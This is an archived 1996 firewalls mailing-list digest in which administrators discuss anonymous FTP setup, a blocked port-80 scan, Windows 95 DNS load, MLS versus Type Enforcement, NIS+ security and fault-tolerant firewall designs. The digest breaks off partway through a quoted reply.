Subject: Re: Securing an anonymous ftp acces X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mondher, I would suggest two sources. I have always found "UNIX System Administration Handbook" by Evi Nemeth, Garth Snyder, and Scott Seebass to be invaluable and they tell you how to set up anonymous ftp. It is published by Prentice Hall and had a 2nd edition published about one year ago. You can reach them at 800-947-7700. The other is CERT advisory 93:10. It is available via anonymous ftp at: cert.org/pub/cert_advisories/CA-93:10.anonymous.FTP.activity. This also gives you detailed instructions on how to set up anonymous ftp. Hope this helps! Brad Van Orden Rapid Systems Solutions From firewalls-owner Thu Feb 1 11:09:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26677 for firewalls-outgoing; Thu, 1 Feb 1996 11:06:08 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA26672 for ; Thu, 1 Feb 1996 11:06:02 -0800 (PST) Received: from maestro.Maestro.COM by relay2.UU.NET with SMTP id QQabbo28655; Thu, 1 Feb 1996 14:03:56 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA17242; Thu, 1 Feb 96 13:53:22 EST Date: Thu, 1 Feb 1996 13:53:21 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Windows 95 clobbering firewall? Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk (Subject: Sick Puppy struggles to appear legitimate) I have a couple of sniffers in a network, one just inside the firewall and the other right next to the network management system. The last time I looked at these was about six weeks ago and when looking today I see something new. The DNS running in the firewall used to get about 10 connects every 12 hours from the company's internal mail system but now the firewall DNS is getting about 10,800 connects every day from the network management system (NMS). The sniffer watching the NMS shows that new Windows 95 machines are connecting to it with NetBios on port 137, NetBios Name Service. It looks like the NMS box in turn queries the firewall. The firewall itself seems to be a Pentium machine, handling about 4,000 incoming messages per day, 3,000 outgoing messages per day and a web user population of about 150 users. Two questions: 1) will the increased DNS queries cause the firewall performance (throughput/response time) to drop; 2) has anyone else seen a similar situation; 3) how would you stop these evil little Windows 95 weevils from nibbling away at the firewall DNS? Yeah, I know. Dawgs have trouble counting. Sick Puppy, the Cat_Eating_Dawg Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter From firewalls-owner Thu Feb 1 13:23:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01287 for firewalls-outgoing; Thu, 1 Feb 1996 13:18:52 -0800 (PST) Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01278 for ; Thu, 1 Feb 1996 13:18:45 -0800 (PST) Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id QAA13623; Thu, 1 Feb 1996 16:20:21 -0500 Date: Thu, 1 Feb 1996 16:20:21 -0500 Message-Id: <199602012120.QAA13623@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: netmgr02@cbe.ab.ca (Glen Larwill), firewalls@GreatCircle.COM From: wbunting@ch.inri.com (Bill Bunting) Subject: Re: Scanning from afar... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hmmm. Someone really wants to know if you are running any WWW servers. Given the times between access list logs, they must be using a scanning tool. At 10:36 AM 2/1/96 -0700, Glen Larwill wrote: >Has anyone seen this type of network scanning before? Addresses have been >changed to protect the inocent and the guilty. > >Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39620) -> X.X.211.227(80), 1 packet >Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39621) -> X.X.211.243(80), 1 packet >Jan 30 11:14:44.054: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39622) -> X.X.211.3(80), 1 packet >Jan 30 11:14:45.070: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39623) -> X.X.211.19(80), 1 packet >Jan 30 11:14:46.294: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39624) -> X.X.211.35(80), 1 packet >Jan 30 11:14:46.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39625) -> X.X.211.51(80), 1 packet >Jan 30 11:14:47.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39626) -> X.X.211.67(80), 1 packet >Jan 30 11:14:48.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39627) -> X.X.211.83(80), 1 packet >Jan 30 11:14:49.910: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39628) -> X.X.211.99(80), 1 packet >Jan 30 11:14:50.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39629) -> X.X.211.115(80), 1 packet >Jan 30 11:14:51.926: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39630) -> X.X.211.131(80), 1 packet >Jan 30 11:14:52.930: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39631) -> X.X.211.147(80), 1 packet >Jan 30 11:14:53.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39632) -> X.X.211.163(80), 1 packet >Jan 30 11:14:54.978: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39633) -> X.X.211.179(80), 1 packet >Jan 30 11:14:55.958: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39634) -> X.X.211.195(80), 1 packet >Jan 30 11:14:56.934: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39635) -> X.X.211.211(80), 1 packet >Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39621) -> X.X.211.243(80), 1 packet >Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39623) -> X.X.211.19(80), 1 packet >Jan 30 11:19:48.992: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39622) -> X.X.211.3(80), 1 packet >Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39627) -> X.X.211.83(80), 1 packet >Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39626) -> X.X.211.67(80), 1 packet >Jan 30 11:19:49.000: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39620) -> X.X.211.227(80), 1 packet >Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39624) -> X.X.211.35(80), 1 packet >Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39625) -> X.X.211.51(80), 1 packet >Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39632) -> X.X.211.163(80), 1 packet >Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39635) -> X.X.211.211(80), 1 packet >Jan 30 11:20:49.028: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39633) -> X.X.211.179(80), 1 packet >Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39629) -> X.X.211.115(80), 1 packet >Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39634) -> X.X.211.195(80), 1 packet >Jan 30 11:20:49.036: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39628) -> X.X.211.99(80), 1 packet >Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39631) -> X.X.211.147(80), 1 packet >Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp >X.X.143.14(39630) -> X.X.211.131(80), 1 packet > >The node in question here has scanned a few other subnets looking for >connections to port 80. Is this a recognised scanning program or something >home grown? > >I have attempted to contact someone at the remote network, but have not >received a response. > > Glen Larwill - glarwill@cbe.ab.ca _/_/_/_/ _/_/_/_/ _/_/_/_/ > PH (403) 294-8380, FAX (403) 294-8431 _/ _/ _/ _/ > Network Systems Software Analyst _/ _/_/_/_/ _/_/_/ > Calgary Board of Education _/ _/ _/ _/ > Calgary Alberta, Canada _/_/_/_/ _/_/_/_/ _/_/_/_/ > > > --------------------------------------- | Bill Bunting, Software Engineer | ****** |Inter-National Research Institute, Inc.| ***_******_ __ _ | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== | (wbunting@inri.com) | ********* | (bunting@cs.odu.edu) | ***** | http://www.cs.odu.edu/~bunting | --------------------------------------- From firewalls-owner Thu Feb 1 13:43:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01454 for firewalls-outgoing; Thu, 1 Feb 1996 13:29:39 -0800 (PST) Received: from main.geminisecure.com (main.geminisecure.com [205.179.16.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01449 for ; Thu, 1 Feb 1996 13:29:35 -0800 (PST) Received: (from leonard@localhost) by main.geminisecure.com (8.6.9/8.6.9) id NAA15680; Thu, 1 Feb 1996 13:18:10 -0800 Date: Thu, 1 Feb 1996 13:18:10 -0800 (PST) From: Leonard Miyata To: Jane Ferreira Cunha cc: firewalls@GreatCircle.COM Subject: Re: What are MLS and TE? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 1 Feb 1996, Jane Ferreira Cunha wrote: > > > Please, where can I find some explanation about MLS and TE? I've > seen a lot of discussion about them, but so far I could understand it. > Are they in a FAQ somewhere? > > TIA, > > Jane For MLS, the offical standards are Department of Defence Trusted Computer System Evaluation Criteria (TCSEC) DOD 5200.28-STD and the Trusted Network Interpretation (TNI) NCSC-TG-005 . A good book for the Operating System implications is 'Building A Secure Computer System' by Morrie Gasser. For TE, the best source is probably the SCC Web site. I believe there is a recent article in BYTE magazine (Jan or Feb 96) as well Leonard Miyata aka leonard@geminisecure.com GEMINI COMPUTERS INC Company web site http://www.geminisecure.com From firewalls-owner Thu Feb 1 13:58:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01498 for firewalls-outgoing; Thu, 1 Feb 1996 13:32:33 -0800 (PST) Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA01493 for ; Thu, 1 Feb 1996 13:32:27 -0800 (PST) Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id IAA24564; Fri, 2 Feb 1996 08:29:03 +1100 (EST) Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id IAA17222; Fri, 2 Feb 1996 08:35:19 +1100 From: Jas (Matthew K) Message-Id: <199602012135.IAA17222@maverick.itd.uts.edu.au> Subject: Re: Internet-access from Novell To: ewoodrick@ed-com.com (Ed Woodrick) Date: Fri, 2 Feb 1996 08:35:18 +1100 (EST) Cc: firewalls@greatcircle.com (Firewalls Mailing List) In-Reply-To: from "Ed Woodrick" at Feb 1, 96 07:27:52 am X-Gcb: -----BEGIN GEEK CODE BLOCK----- X-Gcb: Version: 3.1 X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) C+++$ UVS++++$ P+++ L+ E++ W++ N++ X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+ X-Gcb: D+ e h- r !y X-Gcb: ------END GEEK CODE BLOCK------ X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K) X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8 X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ed Woodrick wrote this... > I know that this is probably a radical answer, but what about using > Novel access permissions to restrict access to the data? I don't > know why you would want to go to the trouble of putting up firewalls > when just a simple permission change should work. It's a lot easier > and I expect a lot safer to perform security at the operating system > level than at the network level. > Ed Woodrick ARGH! isnt the failures to do this with Unix a lesson?? just setting user permission access to data normally isnt enough (unless you have a B2+ system with MAC and even then sometimes). Novell can be hacked, and if you leave the network open someone will do it. Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Data Network Admin Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike From firewalls-owner Thu Feb 1 14:28:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03013 for firewalls-outgoing; Thu, 1 Feb 1996 14:20:19 -0800 (PST) Received: from sparc14.cs.uiuc.edu (sparc14.cs.uiuc.edu [128.174.244.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA03008 for ; Thu, 1 Feb 1996 14:20:14 -0800 (PST) Received: (from jwthomp@localhost) by sparc14.cs.uiuc.edu (8.7.3/8.7.3) id QAA01008; Thu, 1 Feb 1996 16:15:13 -0600 (CST) From: thompson jeffrey w Message-Id: <199602012215.QAA01008@sparc14.cs.uiuc.edu> Subject: Re: What are MLS and TE? To: leonard@geminisecure.com (Leonard Miyata) Date: Thu, 1 Feb 1996 16:15:12 -0600 (CST) Cc: jane@gwosi.telesc.gov.br, firewalls@GreatCircle.COM In-Reply-To: from "Leonard Miyata" at Feb 1, 96 01:18:10 pm Reply-To: jwthomp@uiuc.edu X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > On Thu, 1 Feb 1996, Jane Ferreira Cunha wrote: > > > > > > > Please, where can I find some explanation about MLS and TE? I've > > seen a lot of discussion about them, but so far I could understand it. > > Are they in a FAQ somewhere? > > > > TIA, > > > > Jane > > For MLS, the offical standards are Department of Defence Trusted Computer > System Evaluation Criteria (TCSEC) DOD 5200.28-STD and the Trusted > Network Interpretation (TNI) NCSC-TG-005 . A good book for the > Operating System implications is 'Building A Secure Computer System' by > Morrie Gasser. > > For TE, the best source is probably the SCC Web site. I > believe there is a recent article in BYTE magazine (Jan or Feb 96) > as well > I also recommend looking at the TSIG pages at http://www.sterling.com Best of luck, Jeff Thompson Jeff Thompson(jwthomp@uiuc.edu) Argus Systems Group http://www.uiuc.edu/ph/www/jwthomp - Trusted Systems Network Programmer ACM at UIUC Vice Chair / SigNET Chair Member *The Guild From firewalls-owner Thu Feb 1 14:32:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01464 for firewalls-outgoing; Thu, 1 Feb 1996 13:30:11 -0800 (PST) Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA01459 for ; Thu, 1 Feb 1996 13:30:02 -0800 (PST) Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id IAA24481; Fri, 2 Feb 1996 08:26:34 +1100 (EST) Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id IAA17213; Fri, 2 Feb 1996 08:32:50 +1100 From: Jas (Matthew K) Message-Id: <199602012132.IAA17213@maverick.itd.uts.edu.au> Subject: Re: NIS+ To: fina@novo.dk (Finn T Andersen) Date: Fri, 2 Feb 1996 08:32:49 +1100 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9602011239.ZM14289@eagle.novo.dk> from "Finn T Andersen" at Feb 1, 96 12:39:49 pm X-Gcb: -----BEGIN GEEK CODE BLOCK----- X-Gcb: Version: 3.1 X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) C+++$ UVS++++$ P+++ L+ E++ W++ N++ X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+ X-Gcb: D+ e h- r !y X-Gcb: ------END GEEK CODE BLOCK------ X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K) X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8 X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Finn T Andersen wrote this... > There has been a lot of good information and suggestions about NIS > recently, however, noone has mentioned anything about NIS+. I have > heard that NIS+ should be a very secure system, but in fact I have > never heard about anyone who was using it. Is it available, and on > what platforms ? yes, NIS+ is far more secure than NIS. It uses SecureRPC to form the under lying basis of its security, and uses access control lists for data in the tables (even down to indiviual table entries. ie everyone owns their own passwd entry so you can only see your own encrypted password field). it also supports network encryption of certain fields (down to individual entries within a table entry) on versions shipped within the US. SecureRPC is based on Diffie Helman for key exchange, and DES for encryption/authentification. It does have time limited credentials and most of the other good stuff, and has been around for a while. Most NFS implementations support SecureRPC as a securing method (ie only you can read your files, and root can only read your files while your logged in, network traffic with secure NFS is encrypted (with your key). last i heard NIS+ had been adopted by COSE (i could be completely wrong here), so all the COSE people should be supporting it at _some_ stage. last i heard the only major Unix player who wasnt eventually going to start using NIS+ was SGI, but again i could be wrong. I havent looked at the COSE side of NIS+ for over a year now. If anyone has any deeper questions about using NIS+ as an authentification method etc et al, ask... I admined a 6000 user site using NIS+ for almost 18 months.. now i only admin a 2000 user site :| (again using NIS+). Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Data Network Admin Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike From firewalls-owner Thu Feb 1 14:53:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03898 for firewalls-outgoing; Thu, 1 Feb 1996 14:40:50 -0800 (PST) Received: from gatekeeper.qualix.com (gatekeeper.qualix.com [192.91.182.105]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA03883 for ; Thu, 1 Feb 1996 14:40:44 -0800 (PST) Received: from qualix.qualix by gatekeeper.qualix.com (8.6.9/Q940531.1) id OAA05764; Thu, 1 Feb 1996 14:39:44 -0800 Received: from qualix20.qualix by qualix.qualix (4.1/SMI-4.1-Q931113.1) id AA25086; Thu, 1 Feb 96 14:39:43 PST Received: from patience5.qualix by qualix20.qualix (SMI-8.6/SMI-SVR4) id OAA11978; Thu, 1 Feb 1996 14:39:39 -0800 Received: by patience5.qualix (SMI-8.6/SMI-SVR4) id OAA05576; Thu, 1 Feb 1996 14:39:38 -0800 Date: Thu, 1 Feb 1996 14:39:38 -0800 From: hle@qualix.com (Hung Le) Message-Id: <199602012239.OAA05576@patience5.qualix> To: firewalls@greatcircle.com Subject: Re: Fault Tolerant Firewall Cc: mdr@vodka.sse.att.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Md5: pB+8z683tZlWnKTQqyttDg== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I've seen configurations using dual ported SCSI that were able to get > going much faster than that. If Machine A went down, Machine B would > take over its disk drives and start up new services. The disk > themselves were striped RAID. I think it used a heart beat to > determine when A had died. The nice part of the arrangement was that > if both machines had separate services, they could back up each > other. If memory serves, 3-5 minutes is a better figure plus a > configurable amount of time to make sure that A is indeed "down". > Sounds like Qualix SecureWatch environment. Currently, it only supports Checkpoint Firewall-1. But the environment is fairly flexible and can be made to support other firewall systems. For more information see URL: http://www.qualix.com/sysman/product/securewatch.htmld/ > I'd call this fault-resilient, not fault tolerant. But it may be > less expensive to get 2 cheap boxes than 1 expensive special purpose > fault tolerant-in-the-hardware box. > > Mark Riggins > > % --- % Hung H. Le - Qualix Group, Inc. hle@qualix.com or uunet!qualix!hle % Voice: 415.572.0200 FAX: 415.572.1300 % Qualix Group WWW server: "http://www.qualix.com" From firewalls-owner Thu Feb 1 16:08:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06892 for firewalls-outgoing; Thu, 1 Feb 1996 15:56:44 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA06879 for ; Thu, 1 Feb 1996 15:56:34 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id RAA06419; Thu, 1 Feb 1996 17:54:52 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id RAA06415; Thu, 1 Feb 1996 17:54:51 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id RAA16495; Thu, 1 Feb 1996 17:55:24 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id RAA16089; Thu, 1 Feb 1996 17:55:26 -0600 Date: Thu, 1 Feb 1996 17:55:26 -0600 From: Rick Smith Message-Id: <199602012355.RAA16089@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, watt@sware.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Charles Watt writes: >Actually, Rick, your analysis below does show a lack of >understanding in the capabilities of most MLS systems. Your >analysis assumes that the MAC labels enforced by such systems >are strictly hierarchical, e.g.: Excuse me, but I doubt you could do any of this without categories and/or compartments. I am surprised that you could infer their absence from that message. MLS couldn't come even close to competing with type enforcement if it lacked non-hierarchical labels. >Here your understanding of MLS networking breaks down. Read >the existing standards, such as RFC 1108 or the DoD's Common Security >Label spec. Naturally I've read various IPSO specs. Labeled IP is largely irrelevant to the firewalls marketplace today, and I suspect they will remain so for the next few years (perhaps an interesting topic for a different thread). We sell very, very little to sites that use labeled IP protocols. Most people need to interoperate with standard hosts operating without IPSO labels. Your subsequent comments are correct only if you are operating with labeled interfaces and you associate labels with individual services. This is, of course, an unlikely application of labels on Internet traffic. >Now I'm not an expert on Type Enforcement, but we do have a couple >of ex-SCC developers here. We've discussed the pros/cons of >TE vs. MLS at length for quite some time and have come to the conclusion >that ANYTHING that can be done with TE can also be done with MLS and >vice versa. Of course the architectures are different, and some >problems fit more naturally with one or the other approach. But the >capabilites are virtually identical, particularly when applied to >firewalls and similar separation problems. The bottom line is, of course, that both are forms of mandatory access control. We all agree on that point. (Hi, Barry). Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Feb 1 16:09:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06489 for firewalls-outgoing; Thu, 1 Feb 1996 15:42:07 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA06475 for ; Thu, 1 Feb 1996 15:41:58 -0800 (PST) Received: by garrison.com. (4.1/Nutered Mailer) id AA04194; Thu, 1 Feb 96 17:37:50 CST Date: Thu, 1 Feb 96 17:37:50 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602012337.AA04194@garrison.com.> To: mdr@vodka.sse.att.com, smith@sctc.com Subject: Re: Mandatory protection (was: product selection) Cc: firewalls@greatcircle.com, jgt10@amdahl.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I've always recognized that MLS systems can impose mandatory > protection bariers between processes by using levels, > categories, and compartments, but I still concluded "No." > This is based on my view of high assurance MLS obsessed with > confidentiality. The argument goes as follows: > > 1) Typical Internet TCP/IP traffic does not contain labels. > 2) The network interface in an MLS system is always assigned > a label. > 3) If a network interface receives a packet that does not > already contain a label, then the packet must be assigned > the network interface's label. > 4) All packets sent or received as typical Internet TCP/IP > traffic carry the same label (from 1, 2, 3). Call this > label the "Internet Label." > 5) If two processes have the same label, there is no way to > enforce mandatory MLS protection between them. > 6) Every network server process is assigned a label. > 7) A network server process can only send and receive > packets if the packets' labels are identical to the label > of the network server process. > 8) Any network server process that handles Internet traffic > must be assigned the "Internet Label" (from 4, 7). > 9) All Internet server processes must be assigned the > "Internet Label" (from 6, 8). > 10) You can't enforce MLS between Internet servers (from 5, 9). > > I suspect our misunderstandings are tied to statement 3) > above. On Sidewinder we can associate TCP/IP port numbers > with separately labeled domains in the TE system. The only > way you can get a similar result in an MLS system is to > associate TCP/IP port numbers with MLS confidentiality > labels. For example, the B1 system might define a category > or compartment label for "Mail" and restrict Port 25 > traffic to processes with the Mail label. If so, this changes > how statement 3) is phrased, and completely changes the > conclusion. > > The problem is, you can't assign MLS labels that way if > you're obsessed with confidentiality. I can think of > three reasons immediately as to why not: > I would propose a different use for the MLS architecture. outside---o.proxies----i.proxies-----inside o.proxies have level of '1'. i.proxies have level of '2'. o.proxies do not have access to write to the inside ethernet interface. i.proxies have priviledge to read o.proxies based on label being dominant. From what I see, this would make a connection-based attack useless. You could break into the firewall and subvert the o.proxies. Data-based attacks could potentially succeed if neither proxies noticed the signature. Connection based attacks would be limited to harming the level '1' environment. I would be interested in hearing comments... Jeromie Jackson Garrison Associates jeromie@garrison.com p.s. I do not know if any firewalls implement this type of model/theory, but it seems theoretically sound from the few mind blips I've had. From firewalls-owner Thu Feb 1 16:27:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA07380 for firewalls-outgoing; Thu, 1 Feb 1996 16:07:47 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA07366 for ; Thu, 1 Feb 1996 16:07:41 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id SAA06751; Thu, 1 Feb 1996 18:06:40 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id SAA06747; Thu, 1 Feb 1996 18:06:40 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id SAA16728; Thu, 1 Feb 1996 18:07:14 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id SAA16504; Thu, 1 Feb 1996 18:07:15 -0600 Date: Thu, 1 Feb 1996 18:07:15 -0600 From: Rick Smith Message-Id: <199602020007.SAA16504@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, t-jont@microsoft.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jonathon Tidswell asks about some things, and I'll comment on the ones not already answered: >- TE is a MAC mechanism for providing least privilege Actually, it provides access control with respect to read, write, and execute so you have pretty fine control over what code gets executed when handling which data. This makes it easy to enforce integrity constraints on what is done to various data items. You can pretty much implement the Clark-Wilson integrity model with the mechanism. It also provides least privilege as a side effect. >Is there a common model or mechanism (other than TE) for least privilege in >B2 (and above) systems ? The only other one I've heard anything about is the integrity mechanism used in the old Honeywell SCOMP and probably in the HFSI/Wang XTS200 and 300 (Karen?). The mechanism is based on the Biba integrity model. There aren't that many B2/B3/A1 systems out there, so there aren't too many implemented alternatives. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Feb 1 19:08:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA14194 for firewalls-outgoing; Thu, 1 Feb 1996 18:59:01 -0800 (PST) Received: from crl.crl.com (crl.com [165.113.1.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA14188 for ; Thu, 1 Feb 1996 18:58:57 -0800 (PST) Received: by crl.crl.com id AA09605 (5.65c/IDA-1.5); Thu, 1 Feb 1996 18:46:58 -0800 Date: Thu, 1 Feb 1996 18:46:57 -0800 (PST) From: Tim Keanini To: Sick Puppy Cc: firewalls@GreatCircle.com Subject: Re: Windows 95 clobbering firewall? In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 1 Feb 1996, Sick Puppy wrote: > (Subject: Sick Puppy struggles to appear legitimate) > > I have a couple of sniffers in a network, one just inside the firewall > and the other right next to the network management system. > The last time I looked at these was about six weeks ago and when > looking today I see something new. > > The DNS running in the firewall used to get about 10 connects every 12 